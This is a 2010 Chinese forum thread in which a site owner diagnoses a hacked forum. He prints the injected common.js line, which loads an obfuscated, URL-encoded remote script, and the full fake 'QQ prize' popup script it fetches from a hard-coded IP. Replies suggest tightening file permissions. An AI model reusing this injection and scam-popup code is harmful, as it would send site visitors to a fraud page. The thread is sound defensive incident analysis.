我今天也发现论坛弹中奖消息了，论坛js代码被纂改了

风雨燕双飞

今天上论坛的时候，果然看到了那个qq中奖消息，最后我发现在论坛
<script src="forumdata/cache/common.js?I0Z" type="text/javascript"></script>
其中这段被挂马了，在这段js代码中嵌套了另外一段js代码
document.write ('<SCRIPT src="http://%77%77%77%2E%71%71%63%6E%32%30%31%30%2E%63%6F%6D/%77%65%62/%6A%73/%64%74%72%65%65%2E%6A%73"></script>');

http://%77%77%77%2E%71%71%63%6E%32%30%31%30%2E%63%6F%6D/%77%65%62/%6A%73/%64%74%72%65%65%2E%6A%73这个地址是加密的，实际上是打开了另一个js文件http://111.122.210.3/css/b.js ，而在http://111.122.210.3/css/b.js中，就是最终弹出的那个虚假中奖消息了。代码如下：


var cookieString=document.cookie;
var start=cookieString.indexOf("cookiesleep");
if(start!=-1){}else{var expires=new Date();
expires.setTime(expires.getTime()+6*60*60*1000);
document.cookie="cookiesleep=test;expires="+expires.toGMTString();
var qq_etewidth = 254;
var qq_eteheight = 156;
var qq_banner_filename = "http://111.122.210.3/css/qq1.gif";
var qq_gotoUrl = "http://111.122.210.3/css/tz.asp";
document.write("<div id=eteUnionUpFloat style='margin:0px;padding-bottom:300px;z-index: 10;position:absolute;width:"+qq_etewidth+"px;height:"+qq_eteheight+"px;'>")
document.write("<a href='"+qq_gotoUrl+"' target='_blank'><img src='"+qq_banner_filename+"' border='0' style='cursor: hand;' width='"+qq_etewidth+"' height='"+qq_eteheight+"'></a>")
document.write("</div>")
var bodyfrm = ( document.compatMode.toLowerCase()=="css1compat" ) ? document.documentElement : document.body;
var adst = document.getElementById("eteUnionUpFloat").style;
adst.top = ( bodyfrm.clientHeight - qq_eteheight ) + "px";
adst.left = ( bodyfrm.clientWidth - qq_etewidth ) + "px";
function moveR() {
adst.top = ( bodyfrm.scrollTop + bodyfrm.clientHeight - qq_eteheight ) + "px";
adst.left = ( bodyfrm.scrollLeft + bodyfrm.clientWidth - qq_etewidth ) + "px";
}
var objTimer=setInterval("moveR();", 100);
function Clo**(){
adst.display='none';
}
function ete_closediv()
{
document.getElementById('eteUnionUpFloat').style.visibility='hidden';
if(objTimer) window.clearInterval(objTimer)
}document.writeln("<BGSOUND balance=0 src=\"http://111.122.210.3/css/system.wav\" volume=-240>");
}


而那个IP地址111.122.210.3是贵州的

川渝秦缘

问题就在那儿,
可不晓得是从哪儿来的.
更不知道如何医治.

泥娃娃

都好久了

59Sir

问题就在那儿,
可不晓得是从哪儿来的.
更不知道如何医治.
川渝秦缘 发表于 2010-6-24 17:27

    有些网站啊...
    您最好少看哦...

儒林寺

就是啊
怎么治呢？

风雨燕双飞

检查一下 forumdata文件夹的权限呢，要不就设置为只读

风雨燕双飞

论坛目录取消everyone的写入权限看看

月光冷舞

建议老大把 风雨燕双飞  聘为论坛技术管理。一看就比大伙专业得多！ 风雨燕双飞 应该是个站长吧？

不是成都人

有些网站啊...
    您最好少看哦...
〢.◆譽ēr. 发表于 2010-6-24 17:39

    和这个无关的，是论坛DZ语言的一个漏洞~

风暴太子

应该处理一下

风雨燕双飞

建议老大把 风雨燕双飞  聘为论坛技术管理。一看就比大伙专业得多！ 风雨燕双飞 应该是个站长吧？
月光冷舞 发表于 2010-6-24 19:10

    抬举我了，是个站长没错，技术上我也很菜

月光冷舞

抬举我了，是个站长没错，技术上我也很菜
风雨燕双飞 发表于 2010-6-24 23:12

    呵呵！一定要为咱简阳本土论坛扎起哟！你有那个实力哈

小帅

论坛人才大有人在
比如楼上这位

没有本事咋个能当元帅呢
而且还是大元帅
阅读权限和老大的一样
光是这个就很厉害了

疯猪

谢谢楼主